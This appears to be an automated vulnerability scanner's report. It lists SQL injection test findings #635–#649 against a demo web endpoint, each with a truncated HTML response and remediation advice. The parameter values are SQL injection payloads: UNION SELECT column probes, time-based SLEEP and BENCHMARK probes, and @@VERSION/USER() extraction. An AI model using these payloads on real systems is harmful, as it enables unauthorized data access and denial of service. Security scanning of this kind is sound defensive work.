CWE-89\nIssue Number #635\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #636\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #637\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' or ''^'Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #638\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT USER(),SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #639\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #640\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #641\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io (SELECT * FROM (SELECT(SLEEP(5)))ecMj)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #642\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #643\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT NULL\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #644\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #645\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #646\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #647\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #648\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #649\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io or benchmark(50000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" 